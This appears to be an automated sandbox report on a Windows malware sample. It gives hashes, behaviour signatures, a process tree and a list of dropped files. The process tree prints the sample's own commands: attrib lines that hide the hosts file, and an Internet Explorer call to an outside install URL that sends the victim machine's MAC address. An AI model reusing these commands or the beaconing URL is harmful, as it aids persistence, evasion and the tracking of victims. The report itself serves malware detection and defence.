Overview

overview

8

Static

static

3

bd5ca4e526...18.exe

windows7-x64

8

bd5ca4e526...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    149s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    23-08-2024 22:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe

  • Size

    46KB

  • MD5

    bd5ca4e52639067d28151719615b587d

  • SHA1

    51718e6feef6d23a9b00536a28c9a4e259a7f45a

  • SHA256

    83a2cd295660aa9acc296769b4af8607cc6ad9c37d16fe303590041e1ac31613

  • SHA512

    87eae489684b9f470a27bf6a604df4966ca3e57f2392718b2504a63c29ba6aae9cf58ae166976ff3b15d7d892902f2d796b02c3f8ee806f4d765c0a53e8feb27

  • SSDEEP

    768:oK7vMVvp3w/qUfsRd9Zsb5CDsaSur5dikXBgOHtg8mVD2wVyl3qU5dM9KRxXH5Y:HvMVvp3w/hcG5esaSur5AyH7q5VMp5dA

Score
8/10
discoveryevasionpersistence

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1324
      • C:\Users\Admin\AppData\Local\Temp\bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
        "C:\Users\Admin\AppData\Local\Temp\bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe"
        2⤵
        • Adds policy Run key to start application
        • Drops file in Drivers directory
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\SysWOW64\attrib.exe
          attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2860
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Sets file to hidden
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2792
        • C:\program files\internet explorer\iexplore.exe
          "C:\program files\internet explorer\iexplore.exe" "http://www.dnbqq.cn/234/install.asp?ver=090107&tgid=baizi&address=DE-CC-44-E0-FF-92&regk=1&flag=96eafb97a7be7380ed69b19452fb9fc2&frandom=9228"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:275457 /prefetch:2
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2880
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:734214 /prefetch:2
            4⤵
              PID:2384

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        1fb423b4b4a0738cd083fb9ac4c14ac0

        SHA1

        3e0d2f4050b56b784db2f6823fcd77dbd3733529

        SHA256

        b5c73e8430cd25af3a66123a15a9c1fafa5fe78e4802783043b1a00c3ac7a9fd

        SHA512

        a61a0ca41112ccfcffe22f90b6c24d1dee439d40f05f0aaccca473f591edc478048df2245c1435e641e9643e9be911698b7f45e9188f6c3b8365bcfabf4de878

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        8ba402af20d95b205b4276eee47b2363

        SHA1

        aecc72fd35496fb0cfb9e592cb22f3646896ceb0

        SHA256

        28855bb279e75cd164f42410e9bacb59c2a94f29561b26167325cbb08cf85799

        SHA512

        249324e47717bd2a4c327a47d13002fde8c43bf255ce1154b4ed552462832ceac76c9ed7730fc7c331193b9ac490fbc6bdf4ee57f27985adcbed638c3e6087cc

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        53d4ad8436e65082f62c8d59ed5a77a3

        SHA1

        87cb5e276bcaac95c4c4e981576a63aad6d88d9e

        SHA256

        4ddddd509678275373f74ed3eed332ca8ea41c1609b028118b3392dbea03300e

        SHA512

        266f8737f967d9f4852458355e4406092ad01e9ffddec4f1f1d7fa39cfe454359bd97edf113afb2f269c6c6e02e4c777111e8ba7bfe4fa75ddf7c0ca4987f26c

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        0e1b7c6de587ea577442bfb7b069d7b0

        SHA1

        8225286484d30dca0b2d52cebe040b1acd1588d4

        SHA256

        5e3caa1ff6629971ccedf1539b8a3432643ec5fd47ed06fb84a7211201bb6c88

        SHA512

        2a1b0b508b24feb24a19541bf4f39cabd62231f997ee4429ad4af72cd38329be774fa57219368a594d7c0807b6cd9969b1b5b01951aee5dfa3ddeaa975f4bbb8

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        af782d3c04c060368162bd29fad43cb6

        SHA1

        a27fc45a7ea96a331627b2307b16531c9ea2d7f4

        SHA256

        e759878a48a525daa9d1a7b443c9e69da33b23edda9796464fc629a8b1f4266d

        SHA512

        b05c812c6ab3d8222bf6f5c3efa19359bf796ce277d32cb86ebeb6c66e39babf4aee2081d19b1571ec3705792aed09ab48efd9a71344119d689c2bd5ca3a3d34

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        25921220b5ca610ab8f0dbddb6dc9578

        SHA1

        e206952615534961b63d4fcbe8f497494eb85e37

        SHA256

        499f33123541a98cc4a989dad418dd8b16ad7954663ed0167ebfff8405775c24

        SHA512

        915b523c90eba5eaaf550438911a92320fa2092587812bc1d817500788746fa9a8c617492b5b7f01d408c706c7d850c726163192f10842c26397a9e102947c0d

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        f734e04a454568f9e3ea2beb24ad0b41

        SHA1

        1da0f13bc7ae910afcc7155eb8d805e162af19bf

        SHA256

        e4c34e7501ebfe18e90e53cdcd02833a21ad4843797642569559c20e7caa42bf

        SHA512

        a1fefe2403fbe7fd703eb85375305ca1e8168c86c8bfc3fa136eaafc9d7f1a98da8c88cf9b4088db6bc1b3abb20dbfe22a4be79c145bac6dd1306abdbd0d610b

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        887e654177f2e1553e6f6496218bb1d0

        SHA1

        524180ad48c26046d02181749dccbb531af30379

        SHA256

        cfc0e42f01d8d3f31a482943c3686829539e995659d0f0d4727236fe82f7db19

        SHA512

        01bf1f6670e505fccd57d3676f8f46cdab460895e5ae9a9abcf9d9a0b464b28eaa2dd5e614fd7daf644cf285e3dbda4b131b2ff1b78e3fd0730e6c9cfec6229b

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        5435529fc68261e4d49b461005fb2393

        SHA1

        fa05887da38c02e525527192e4f5854994bb1fd2

        SHA256

        ffe89b677b5bbfc293e771e4dc2b391e4b7a71cb16fad552e98bda9816ac4030

        SHA512

        4bf0260e7a80c2cad837487d0b1162e1ef29696fdf3fda49001ce037cef3386f11f769ad51eecfd403dc79b2c3fe2712b2522c9a4311e305cb8338e939fd405d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Cab7B3B.tmp
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Tar7BAB.tmp
        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\~DF8FABB00109484B72.TMP
        Filesize

        16KB

        MD5

        f42b078e9f0e7b47a3f84c77bb9bfc02

        SHA1

        dc180481b606350a54409f1db99d7bdefafd36d8

        SHA256

        922eacff61bd5565c20411183d33c909aa2bb9214739a0cededba358a7023bdc

        SHA512

        aa97f7d28e54d9b5b0166d4cca158a212d77e91755fa1a7bafb7357b2a13d8705fbdacdcdbb36b0994b4f09c89c7124975a224c133bdbe56f36c56d3dfa886b6

        Download Submit

      • memory/1324-447-0x0000000002520000-0x0000000002521000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1324-449-0x0000000002520000-0x0000000002521000-memory.dmp

        Filesize

        4KB

        Download